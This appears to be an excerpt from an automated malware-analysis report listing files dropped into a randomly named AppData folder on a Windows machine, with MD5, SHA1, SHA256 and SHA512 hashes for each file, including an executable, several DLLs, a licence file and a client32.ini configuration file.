C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2a93d653c9708e9b42505380eb60a1da |
| SHA1 | abb42a825497e56c3006d53a48d776cc3ff8f5a9 |
| SHA256 | a91f1a988cf3729c94e1d0d0fda0d379462ae678c487e6d179f5ca1f4e1a948e |
| SHA512 | 44505d7ee19221379372155a26377ec1e7acc1c34823b0d8bd9e20379cc1e980ead4de8304e02dfe448ee5b642d94e47d7796eef1d13e6179b758217f3173013 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\whost.exe
| MD5 | c0eb3eac96511077dafc0afa64c6388c |
| SHA1 | 33e81f25493eda3bbf0b7cdcddd523547fa6c31e |
| SHA256 | eec4f18f3655f7eab0c08783ad42d2b3ce3ef21ecad7394e165f11acdb41c42a |
| SHA512 | 2632bef55323d9a272e1519e2b2792527d28cbd9fe6a9f9d253e5729978be0de6f36b8e3b2acee70449ba22a33efb41c82c82afe19dad14698b3ada0006ca7fc |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.dll
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICL32.DLL
| MD5 | 00587238d16012152c2e951a087f2cc9 |
| SHA1 | c4e27a43075ce993ff6bb033360af386b2fc58ff |
| SHA256 | 63aa18c32af7144156e7ee2d5ba0fa4f5872a7deb56894f6f96505cbc9afe6f8 |
| SHA512 | 637950a1f78d3f3d02c30a49a16e91cf3dfccc59104041876789bd7fdf9224d187209547766b91404c67319e13d1606da7cec397315495962cbf3e2ccd5f1226 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\PCICHEK.DLL
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\msvcr100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\MSVCR100.dll
| MD5 | 0e37fbfa79d349d672456923ec5fbbe3 |
| SHA1 | 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335 |
| SHA256 | 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 |
| SHA512 | 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcichek.dll
| MD5 | a0b9388c5f18e27266a31f8c5765b263 |
| SHA1 | 906f7e94f841d464d4da144f7c858fa2160e36db |
| SHA256 | 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a |
| SHA512 | 6051a0b22af135b4433474dc7c6f53fb1c06844d0a30ed596a3c6c80644df511b023e140c4878867fa2578c79695fac2eb303aea87c0ecfc15a4ad264bd0b3cd |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\pcicapi.dll
| MD5 | dcde2248d19c778a41aa165866dd52d0 |
| SHA1 | 7ec84be84fe23f0b0093b647538737e1f19ebb03 |
| SHA256 | 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 |
| SHA512 | c5d170d420f1aeb9bcd606a282af6e8da04ae45c83d07faaacb73ff2e27f4188b09446ce508620124f6d9b447a40a23620cfb39b79f02b04bb9e513866352166 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\NSM.LIC
| MD5 | 390c964070626a64888d385c514f568e |
| SHA1 | a556209655dcb5e939fd404f57d199f2bb6da9b3 |
| SHA256 | ad0d05305fdeb3736c1e8d49c3a6746073d27b4703eb6de6589bdc4aa72d7b54 |
| SHA512 | f089c59a24f33410cf98fba7ea0dd2ca0fd997efc9a03e5355cde3c1a1f4a78b13cebd387099b9de824bffea01c489d8f0e90df56f89973007dabb6afdde607f |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\client32.ini
| MD5 | 5d2b788f10e973fce372fa2e4ececd4e |
| SHA1 | 40cc5404b896dd6ed657bba39ffdb6d63f45e9a1 |
| SHA256 | 483b4c008ab680dd0958f5f09c55d6dc35f90fca1c3835fb864a1e8fcb598475 |
| SHA512 | 168c7d962ab5b813e426eca03fd718c05a34d393b2fd79b3685fdcb408ae29399c4b6de8decfa893f039eb871425579cffdbf55465830a7801c065491c95ba20 |
C:\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |
\Users\Admin\AppData\Roaming\f9Av6lBR2ENs\HTCTL32.DLL
| MD5 | 2d3b207c8a48148296156e5725426c7f |
| SHA1 | ad464eb7cf5c19c8a443ab5b590440b32dbc618f |
| SHA256 | edfe2b923bfb5d1088de1611401f5c35ece91581e71503a5631647ac51f7d796 |
| SHA512 | 55c791705993b83c9b26a8dbd545d7e149c42ee358ecece638128ee271e85b4fdbfd6fbae61d13533bf39ae752144e2cc2c5edcda955f18c37a785084db0860c |